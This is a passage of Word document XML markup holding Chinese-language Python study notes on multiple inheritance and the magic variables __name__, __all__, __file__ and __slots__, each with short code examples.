    <w:p w14:paraId="0336E1FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        speaker.__init__(self,n,t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B889BA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C808FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test = sample("Tim",25,80,4,"Python")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0DF95F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.speak()   #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法名同，默认调用的是在括号中排前地父类的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5624B084" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>魔术变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58948D4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://blog.csdn.net/Ka_Ka314/article/details/80151639</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD722D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771212D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>__name__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B68E067" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个模块被另一个程序第一次引入时，其主程序将运行。如果我们想在模块被引入时，模块中的某一程序块不执行，我们可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__name__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性来使该程序块仅在该模块自身运行时执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5175884A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FA538E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32642BCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># Filename: using_name.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F140AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4AE13A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序自身在运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF2047" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3575EBBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我来自另一模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E137A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6620EFE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ python using_name.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189FB8B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序自身在运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427E6234" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A4C4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; import using_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259DA633" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>我来自另一模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFDBAE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF841F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>__all__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32070828" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__all__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可用于模块导入时限制，如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D0AA31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from module import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1DF477" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时被导入模块若定义了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__all__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性，则只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__all__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内指定的属性、方法、类可被导入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A384AD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若没定义，则导入模块内的所有公有属性，方法和类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9B7970" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338E9009" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">#kk.py  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3874A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__all__=('A','func') #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在别的模块中，导入该模块时，只能导入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__all__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的变量，方法和类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DFD3CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">class A():  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD5509" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self,name,age):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4413E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.name=name  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBA83B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.age=age  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31C530" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">class B():  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C668F8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self,name,id):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D7772" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.name=name  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC5A35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.id=id  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D7E97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">def func():  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168E50CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print 'func() is called!'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBEC287" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">def func1():  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D39B11F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print 'func1() is called!'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594CEAAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D39E6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">#test_kk.py  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71A28D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from kk import *  #kk.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中定义了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__all__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性，只能导入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__all__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中定义的属性，方法和类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3575C4E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">a=A('python','24')  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020EB46C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print a.name,a.age  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092C4E0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">func()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BB391F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">#func1() #NameError: name 'func1' is not defined  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B100D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">#b=B('python',123456) #NameError: name 'B' is not defined  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F39D57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E7E4A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>__file__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003BB08A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件所在的路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF057C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6354BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(os.__file__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6C5C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ACDEF81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>__slots__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A1901" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许在定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候，定义一个特殊的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__slots__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量，可接收一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iterable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象作为属性，来限制该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例能添加的属性。优点是可以节约内存：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064E1FFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2E2AF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class Test(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3226F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>__slots__ = ['a']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D62E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B978F29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505BD290" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    t = Test()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA9C0C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    t.a = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245512F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Test.c = 3  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类属性仍然可以自由添加</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC57FFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
